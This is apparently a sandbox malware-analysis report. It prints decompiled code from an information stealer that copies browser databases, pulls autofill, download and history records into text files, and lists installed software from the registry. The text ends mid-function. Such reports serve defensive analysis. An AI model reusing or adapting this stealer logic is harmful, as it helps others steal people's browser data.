                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L11;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					_t67 =  *0x29dd8334(_v544, 0);
                                        					_t100 = _t67;
                                        					_t68 =  *0x29dd8334(_v544, 1);
                                        					_t75 = _t68;
                                        					lstrcatA(_t103, _t67);
                                        					lstrcatA(_t103, "\t");
                                        					lstrcatA(_t103, _t68);
                                        					lstrcatA(_t103, "\n");
                                        					_t74 =  *0x29dd8314(_v544);
                                        					_t111 = _t111 + 0x14;
                                        				} while (_t74 == 0x64);
                                        				goto L6;
                                        			}




































                                        APIs
                                        • _memset.LIBCMT ref: 29D9B2FC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9B312
                                        • _malloc.LIBCMT ref: 29D9B31A
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9B327
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9B340
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9B355
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9B36D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9B37D
                                        • _memset.LIBCMT ref: 29D9B390
                                        • wsprintfA.USER32 ref: 29D9B3B2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9B406
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9B40D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B451
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9B45D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B465
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9B471
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B48D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9B4FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Autofill\%s_%s.txt
                                        • API String ID: 3817689429-429343355
                                        • Opcode ID: 67446b77d2bcec3fa882d08b796599f31e0854ac9c4136cfa13424ba6862faa7
                                        • Instruction ID: 8ad778d891ea841ea2f5a7c9227807180f01ebb7b77771f61fd343a75be49b36
                                        • Opcode Fuzzy Hash: 67446b77d2bcec3fa882d08b796599f31e0854ac9c4136cfa13424ba6862faa7
                                        • Instruction Fuzzy Hash: E651F4B2941258BBD711EBA4EC49FDA7778EF58B05F00819CF50AD7200DA389A45EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D9A7B0(intOrPtr __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				char _v548;
                                        				intOrPtr _v552;
                                        				intOrPtr _v556;
                                        				intOrPtr* _v560;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t44;
                                        				void* _t54;
                                        				long _t57;
                                        				void* _t64;
                                        				int _t65;
                                        				CHAR* _t67;
                                        				CHAR* _t68;
                                        				void* _t74;
                                        				CHAR* _t77;
                                        				intOrPtr* _t85;
                                        				void* _t99;
                                        				void* _t101;
                                        				CHAR* _t102;
                                        				CHAR* _t103;
                                        				signed int _t104;
                                        				void* _t105;
                                        				void* _t108;
                                        				void* _t110;
                                        				void* _t111;
                                        				void* _t115;
                                        
                                        				_t115 = __eflags;
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t35 ^ _t104;
                                        				_t75 = _a4;
                                        				_v556 = _a8;
                                        				_v552 = __ecx;
                                        				_v560 = __edx;
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				_t77 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v276, _t77);
                                        				_t102 = E29DADFE0( &_v276, _t99, _t101, 0x1a);
                                        				 *_t102 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t108 = _t105 + 0x14;
                                        				_t100 = 0x1a;
                                        				do {
                                        					_t44 = E29DAFCF6(_t115);
                                        					asm("cdq");
                                        					_push(_t44 % 0xa);
                                        					_push(_t102);
                                        					wsprintfA(_t102, "%s%d");
                                        					_t108 = _t108 + 0x10;
                                        					_t100 = _t100 - 1;
                                        				} while (_t100 != 0);
                                        				_t102[0x1a] = 0;
                                        				lstrcatA( &_v276, _t102);
                                        				CopyFileA(_t75,  &_v276, 1);
                                        				E29DB5640( &_v540, _t100, 0x104);
                                        				wsprintfA( &_v540, "\\Downloads\\%s_%s.txt", _v552, _v556);
                                        				_t103 =  *0x29dd8280; // 0x15991f0
                                        				_t54 =  *0x29dd8344( &_v276,  &_v548);
                                        				_t110 = _t108 + 0x24;
                                        				if(_t54 != 0) {
                                        					L12:
                                        					return E29DADF46(DeleteFileA( &_v276), _t75, _v8 ^ _t104,  &_v276, _t100, _t103);
                                        				}
                                        				_t57 =  *0x29dd82f8(_v548, _t103, 0xffffffff,  &_v544, _t54);
                                        				_t111 = _t110 + 0x14;
                                        				if(_t57 != 0) {
                                        					L11:
                                        					 *0x29dd8318(_v544);
                                        					 *0x29dd8348(_v548);
                                        					goto L12;
                                        				}
                                        				_t103 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
                                        				_t64 =  *0x29dd8314(_v544);
                                        				_t111 = _t111 + 4;
                                        				if(_t64 != 0x64) {
                                        					L6:
                                        					_t65 = lstrlenA(_t103);
                                        					_t85 = _v560;
                                        					if(_t85 != 0) {
                                        						__eflags =  *_t85 - 2;
                                        						if( *_t85 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t85 + 4)), _t103,  &_v540, _t65, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L11;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					_t67 =  *0x29dd8334(_v544, 0);
                                        					_t100 = _t67;
                                        					_t68 =  *0x29dd8334(_v544, 1);
                                        					_t75 = _t68;
                                        					lstrcatA(_t103, _t67);
                                        					lstrcatA(_t103, "\n");
                                        					lstrcatA(_t103, _t68);
                                        					lstrcatA(_t103, "\n\n");
                                        					_t74 =  *0x29dd8314(_v544);
                                        					_t111 = _t111 + 0x14;
                                        				} while (_t74 == 0x64);
                                        				goto L6;
                                        			}




































                                        APIs
                                        • _memset.LIBCMT ref: 29D9A7EC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A802
                                        • _malloc.LIBCMT ref: 29D9A80A
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A817
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A830
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A845
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9A85D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A86D
                                        • _memset.LIBCMT ref: 29D9A880
                                        • wsprintfA.USER32 ref: 29D9A8A2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A8F6
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A8FD
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A941
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A94D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A955
                                        • lstrcatA.KERNEL32(00000000,29DCFC38), ref: 29D9A961
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A97D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Downloads\%s_%s.txt
                                        • API String ID: 3817689429-2163029947
                                        • Opcode ID: 39dd97fdc10f5f7dd9ef2c8ca5e1a4eaf00805bd2694c79f0374eb6d1a830ba3
                                        • Instruction ID: 0406fac1567fdbd9b99a2188569fb62d703d6bef8ac3f0e7c2250f09eb37c476
                                        • Opcode Fuzzy Hash: 39dd97fdc10f5f7dd9ef2c8ca5e1a4eaf00805bd2694c79f0374eb6d1a830ba3
                                        • Instruction Fuzzy Hash: FD51E3B2941254BBDB11ABA4EC49FDA7778BF58B01F00859CF509D6200DA389A41DBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E29D91230(void* __eflags) {
                                        				signed int _v8;
                                        				char _v5012;
                                        				char _v10012;
                                        				char _v25012;
                                        				char _v75012;
                                        				char _v125012;
                                        				CHAR* _v125016;
                                        				char _v125020;
                                        				CHAR* _v125024;
                                        				signed int _v125028;
                                        				void* __ebx;
                                        				char* __edi;
                                        				CHAR* __esi;
                                        				signed int _t38;
                                        				signed int _t40;
                                        				CHAR* _t47;
                                        				signed int _t52;
                                        				void* _t55;
                                        				char* _t56;
                                        				char _t67;
                                        				CHAR* _t68;
                                        				signed int _t69;
                                        				void* _t70;
                                        				void* _t76;
                                        
                                        				E29DBCDB0(0x1e864);
                                        				_t38 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t38 ^ _t69;
                                        				_t40 =  *0x29dd82ec; // 0x0
                                        				_v125028 = _t40;
                                        				_v125016 = 0;
                                        				E29DB5640( &_v75012, 0, 0xc350);
                                        				E29DB5640( &_v10012, 0, 0x1388);
                                        				E29DB5640( &_v5012, 0, 0x1388);
                                        				E29DB5640( &_v125012, 0, 0xc350);
                                        				E29DB5640( &_v25012, 0, 0x3a98);
                                        				_t47 =  *0x29dd82d8; // 0x75d71020
                                        				lstrcatA( &_v75012, _t47);
                                        				_t65 =  &_v125020;
                                        				_t68 = E29DAEA8E(_t55,  &_v125020, _t67,  &_v75012, ";",  &_v125020);
                                        				_t76 = _t70 + 0x48;
                                        				_t56 = 1;
                                        				if(_t68 == 0) {
                                        					L15:
                                        					return E29DADF46(_t50, _t56, _v8 ^ _t69, _t65, _t67, _t68);
                                        				} else {
                                        					_t67 = _v125020;
                                        					do {
                                        						_t13 = _t56 - 1; // 0x0
                                        						_t52 = _t13;
                                        						if(_t52 > 5) {
                                        							goto L14;
                                        						}
                                        						switch( *((intOrPtr*)(_t52 * 4 +  &M29D9148C))) {
                                        							case 0:
                                        								E29DB5640( &_v10012, 0, 0x1388);
                                        								_t76 = _t76 + 0xc;
                                        								lstrcatA( &_v10012, _t68);
                                        								goto L14;
                                        							case 1:
                                        								 &_v5012 = E29DB5640( &_v5012, 0, 0x1388);
                                        								__ecx =  &_v5012;
                                        								__eax = lstrcatA( &_v5012, __esi);
                                        								goto L14;
                                        							case 2:
                                        								__edx =  &_v125012;
                                        								E29DB5640( &_v125012, 0, 0xc350) =  &_v125012;
                                        								__eax = lstrcatA( &_v125012, __esi);
                                        								goto L14;
                                        							case 3:
                                        								_push(__esi);
                                        								__eax = E29DAEC33();
                                        								__esp = __esp + 4;
                                        								_v125024 = __eax;
                                        								goto L14;
                                        							case 4:
                                        								_push("true");
                                        								_push(__esi);
                                        								__eax =  *0x29dd8550();
                                        								if(__eax != 0) {
                                        									_push("false");
                                        									_push(__esi);
                                        									if( *0x29dd8550() != 0) {
                                        										_push(__esi);
                                        										__edi = 1;
                                        										__eax = E29DAEC33();
                                        										__esp = __esp + 4;
                                        										_v125016 = __eax;
                                        									} else {
                                        										__edi = 0;
                                        									}
                                        								} else {
                                        									_t23 =  &(__eax[1]); // 0x1
                                        									__edi = _t23;
                                        									_v125016 = 0x3e7;
                                        								}
                                        								goto L14;
                                        							case 5:
                                        								__ecx =  &_v25012;
                                        								__eax = E29DB5640( &_v25012, 0, 0x3a98);
                                        								__edx =  &_v25012;
                                        								lstrcatA( &_v25012, __esi) = _v125016;
                                        								__eax = _v125024;
                                        								__ecx =  &_v125012;
                                        								__edx =  &_v5012;
                                        								__edx = _v125028;
                                        								__ecx =  &_v10012;
                                        								__ecx = __esi;
                                        								__eax = E29D90880(__esi, __edx,  &_v10012, _v125024,  &_v5012,  &_v125012, __edi, _v125016);
                                        								__ebx = 0;
                                        								goto L14;
                                        						}
                                        						L14:
                                        						_t65 =  &_v125020;
                                        						_t56 =  &(_t56[1]);
                                        						_t68 = E29DAEA8E(_t56,  &_v125020, _t67, 0, ";",  &_v125020);
                                        						_t76 = _t76 + 0xc;
                                        					} while (_t68 != 0);
                                        					goto L15;
                                        				}
                                        			}



























                                        0x00000000
                                        0x00000000
                                        0x29d91458
                                        0x29d91458
                                        0x29d91466
                                        0x29d9146c
                                        0x29d9146e
                                        0x29d91471
                                        0x00000000
                                        0x29d91310

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$_strtok_s
                                        • String ID: false$true
                                        • API String ID: 657882108-2658103896
                                        • Opcode ID: ad76f058559a5c02415c6740ec4ec15eadf0a47a06738b9a1a18726cca402c55
                                        • Instruction ID: 7195d7a0d08ed0d23fb902d808b4475becdc8e5444ffc28647940860c54baa08
                                        • Opcode Fuzzy Hash: ad76f058559a5c02415c6740ec4ec15eadf0a47a06738b9a1a18726cca402c55
                                        • Instruction Fuzzy Hash: 3451E3B2940254A7D724FBA4DC84FDE73B8AF18700F04859CFA09AB580EE74574A9BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D9A320(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				char _v548;
                                        				intOrPtr _v552;
                                        				intOrPtr _v556;
                                        				intOrPtr* _v560;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t34;
                                        				signed int _t35;
                                        				signed int _t43;
                                        				void* _t53;
                                        				long _t56;
                                        				void* _t63;
                                        				int _t64;
                                        				void* _t73;
                                        				CHAR* _t76;
                                        				intOrPtr* _t84;
                                        				void* _t98;
                                        				void* _t99;
                                        				void* _t100;
                                        				CHAR* _t101;
                                        				CHAR* _t102;
                                        				signed int _t103;
                                        				void* _t104;
                                        				void* _t107;
                                        				void* _t109;
                                        				void* _t110;
                                        				signed int _t115;
                                        
                                        				_t74 = __ebx;
                                        				_t34 =  *0x29dd5664; // 0xd9555f04
                                        				_t35 = _t34 ^ _t103;
                                        				_t115 = _t35;
                                        				_v8 = _t35;
                                        				_v556 = _a4;
                                        				_v552 = __ecx;
                                        				_v560 = __edx;
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				_t76 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v276, _t76);
                                        				_t101 = E29DADFE0( &_v276, _t98, _t100, 0x1a);
                                        				 *_t101 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t107 = _t104 + 0x14;
                                        				_t99 = 0x1a;
                                        				do {
                                        					_t43 = E29DAFCF6(_t115);
                                        					asm("cdq");
                                        					_push(_t43 % 0xa);
                                        					_push(_t101);
                                        					wsprintfA(_t101, "%s%d");
                                        					_t107 = _t107 + 0x10;
                                        					_t99 = _t99 - 1;
                                        				} while (_t99 != 0);
                                        				_t101[0x1a] = 0;
                                        				lstrcatA( &_v276, _t101);
                                        				CopyFileA(__ebx,  &_v276, 1);
                                        				E29DB5640( &_v540, _t99, 0x104);
                                        				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
                                        				_t102 =  *0x29dd81c4; // 0x1591c28
                                        				_t53 =  *0x29dd8344( &_v276,  &_v548);
                                        				_t109 = _t107 + 0x24;
                                        				if(_t53 != 0) {
                                        					L12:
                                        					return E29DADF46(DeleteFileA( &_v276), _t74, _v8 ^ _t103,  &_v276, _t99, _t102);
                                        				}
                                        				_t56 =  *0x29dd82f8(_v548, _t102, 0xffffffff,  &_v544, _t53);
                                        				_t110 = _t109 + 0x14;
                                        				if(_t56 != 0) {
                                        					L11:
                                        					 *0x29dd8318(_v544);
                                        					 *0x29dd8348(_v548);
                                        					goto L12;
                                        				}
                                        				_t102 = HeapAlloc(GetProcessHeap(), _t56, 0xf423f);
                                        				_t63 =  *0x29dd8314(_v544);
                                        				_t110 = _t110 + 4;
                                        				if(_t63 != 0x64) {
                                        					L6:
                                        					_t64 = lstrlenA(_t102);
                                        					_t84 = _v560;
                                        					if(_t84 != 0) {
                                        						__eflags =  *_t84 - 2;
                                        						if( *_t84 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t84 + 4)), _t102,  &_v540, _t64, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L11;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					lstrcatA(_t102,  *0x29dd8334(_v544, 0));
                                        					lstrcatA(_t102, " ");
                                        					lstrcatA(_t102,  *0x29dd8334(_v544, 1));
                                        					lstrcatA(_t102, "\n");
                                        					_t73 =  *0x29dd8314(_v544);
                                        					_t110 = _t110 + 0x14;
                                        				} while (_t73 == 0x64);
                                        				goto L6;
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9A358
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A36E
                                        • _malloc.LIBCMT ref: 29D9A376
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A383
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A397
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A3AC
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A3C4
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A3D4
                                        • _memset.LIBCMT ref: 29D9A3E7
                                        • wsprintfA.USER32 ref: 29D9A409
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A45D
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A464
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A495
                                        • lstrcatA.KERNEL32(00000000,29DCFF6C), ref: 29D9A4A1
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A4BB
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A4C7
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A4E3
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A550
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Autofill\%s_%s.txt
                                        • API String ID: 3817689429-429343355
                                        • Opcode ID: 84056291cec806d0237956678e1e48046c9cd4df4a60c3539d7fbdcba457583d
                                        • Instruction ID: 577ae7045303820bb45160e6c255c03636ba6be226ecfa653173d8cf5e16e3b2
                                        • Opcode Fuzzy Hash: 84056291cec806d0237956678e1e48046c9cd4df4a60c3539d7fbdcba457583d
                                        • Instruction Fuzzy Hash: 685106B2981254ABD711EBA4EC49FDA7778AF58B01F00819CF509D6240DA389A45EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E29DA30D0(CHAR* __esi) {
                                        				signed int _v8;
                                        				char _v1032;
                                        				char _v2056;
                                        				char _v3080;
                                        				int _v3084;
                                        				void* _v3088;
                                        				void* _v3092;
                                        				int* _v3096;
                                        				int _v3100;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t36;
                                        				void* _t75;
                                        				long _t76;
                                        				CHAR* _t77;
                                        				signed int _t78;
                                        				void* _t79;
                                        
                                        				_t77 = __esi;
                                        				_t36 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t36 ^ _t78;
                                        				_v3092 = 0;
                                        				_v3088 = 0;
                                        				_v3100 = 0xf003f;
                                        				_v3084 = 0;
                                        				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v3092) == 0) {
                                        					_v3096 = 0;
                                        					_push(_t75);
                                        					do {
                                        						_t71 =  &_v3080;
                                        						_v3084 = 0x400;
                                        						_t76 = RegEnumKeyExA(_v3092, _v3096,  &_v3080,  &_v3084, 0, 0, 0, 0);
                                        						if(_t76 != 0) {
                                        							goto L9;
                                        						} else {
                                        							wsprintfA( &_v2056, "%s\\%s", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v3080);
                                        							_t79 = _t79 + 0x10;
                                        							if(RegOpenKeyExA(0x80000002,  &_v2056, 0, 0x20019,  &_v3088) != 0) {
                                        								_t71 = _v3088;
                                        								RegCloseKey(_v3088);
                                        								_t39 = RegCloseKey(_v3092);
                                        							} else {
                                        								_t71 =  &_v3100;
                                        								_v3084 = 0x400;
                                        								if(RegQueryValueExA(_v3088, "DisplayName", 0,  &_v3100,  &_v1032,  &_v3084) == 0) {
                                        									lstrcatA(_t77,  &_v1032);
                                        									_t71 = _v3088;
                                        									_v3084 = 0x400;
                                        									if(RegQueryValueExA(_v3088, "DisplayVersion", 0,  &_v3100,  &_v1032,  &_v3084) == 0) {
                                        										lstrcatA(_t77, " [");
                                        										lstrcatA(_t77,  &_v1032);
                                        										lstrcatA(_t77, "]");
                                        									}
                                        									lstrcatA(_t77, "\n");
                                        								}
                                        								RegCloseKey(_v3088);
                                        								goto L9;
                                        							}
                                        						}
                                        						L11:
                                        						_pop(_t75);
                                        						goto L12;
                                        						L9:
                                        						_v3096 = _v3096 + 1;
                                        					} while (_t76 == 0);
                                        					_t39 = RegCloseKey(_v3092);
                                        					goto L11;
                                        				}
                                        				L12:
                                        				return E29DADF46(_t39, 0, _v8 ^ _t78, _t71, _t75, _t77);
                                        			}

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000), ref: 29DA3119
                                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000010), ref: 29DA315A
                                        • wsprintfA.USER32 ref: 29DA3182
                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 29DA31A4
                                        • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,?,?,00000400), ref: 29DA31DE
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA31F0
                                        • RegQueryValueExA.ADVAPI32(?,DisplayVersion,00000000,?,?,00000400), ref: 29DA3222
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29DA3232
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA3240
                                        • lstrcatA.KERNEL32(?,29DD07BC), ref: 29DA324C
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29DA3258
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3265
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3280
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA329D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
                                        • String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                        • API String ID: 3722822016-3437733507
                                        • Opcode ID: bbd6fb863aa9435a242b54666d4843761af452f8dbcb116383ccace318187c6b
                                        • Instruction ID: 6aeaf391a9660052ebd90b5b938b8db34778e90f5024ad0338cb7b4847e2ddd6
                                        • Opcode Fuzzy Hash: bbd6fb863aa9435a242b54666d4843761af452f8dbcb116383ccace318187c6b
                                        • Instruction Fuzzy Hash: 6F4109B6900118AFE715DF64DDC4EEAB77DEB48744F40829DE209A3101EE745E8ADF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E29D9A570(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				char _v548;
                                        				intOrPtr _v552;
                                        				intOrPtr _v556;
                                        				intOrPtr* _v560;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t34;
                                        				signed int _t35;
                                        				signed int _t43;
                                        				void* _t53;
                                        				long _t57;
                                        				CHAR* _t62;
                                        				void* _t63;
                                        				int _t64;
                                        				void* _t71;
                                        				CHAR* _t74;
                                        				intOrPtr* _t83;
                                        				intOrPtr _t93;
                                        				void* _t97;
                                        				void* _t98;
                                        				void* _t99;
                                        				CHAR* _t100;
                                        				signed int _t101;
                                        				void* _t102;
                                        				void* _t105;
                                        				void* _t107;
                                        				void* _t108;
                                        				signed int _t112;
                                        
                                        				_t72 = __ebx;
                                        				_t34 =  *0x29dd5664; // 0xd9555f04
                                        				_t35 = _t34 ^ _t101;
                                        				_t112 = _t35;
                                        				_v8 = _t35;
                                        				_v556 = _a4;
                                        				_v552 = __ecx;
                                        				_v560 = __edx;
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				_t74 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v276, _t74);
                                        				_t100 = E29DADFE0( &_v276, _t97, _t99, 0x1a);
                                        				 *_t100 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t105 = _t102 + 0x14;
                                        				_t98 = 0x1a;
                                        				do {
                                        					_t43 = E29DAFCF6(_t112);
                                        					asm("cdq");
                                        					_push(_t43 % 0xa);
                                        					_push(_t100);
                                        					wsprintfA(_t100, "%s%d");
                                        					_t105 = _t105 + 0x10;
                                        					_t98 = _t98 - 1;
                                        				} while (_t98 != 0);
                                        				_t100[0x1a] = 0;
                                        				lstrcatA( &_v276, _t100);
                                        				CopyFileA(__ebx,  &_v276, 1);
                                        				E29DB5640( &_v540, _t98, 0x104);
                                        				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
                                        				_t53 =  *0x29dd8344( &_v276,  &_v548);
                                        				_t107 = _t105 + 0x24;
                                        				if(_t53 != 0) {
                                        					L12:
                                        					return E29DADF46(DeleteFileA( &_v276), _t72, _v8 ^ _t101,  &_v276, _t98, _t100);
                                        				}
                                        				_t93 =  *0x29dd7ec0; // 0x159cd90
                                        				_t57 =  *0x29dd82f8(_v548, _t93, 0xffffffff,  &_v544, _t53);
                                        				_t108 = _t107 + 0x14;
                                        				if(_t57 != 0) {
                                        					L11:
                                        					 *0x29dd8318(_v544);
                                        					 *0x29dd8348(_v548);
                                        					goto L12;
                                        				}
                                        				_t62 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
                                        				_t100 = _t62;
                                        				_t63 =  *0x29dd8314(_v544);
                                        				_t108 = _t108 + 4;
                                        				if(_t63 != 0x64) {
                                        					L6:
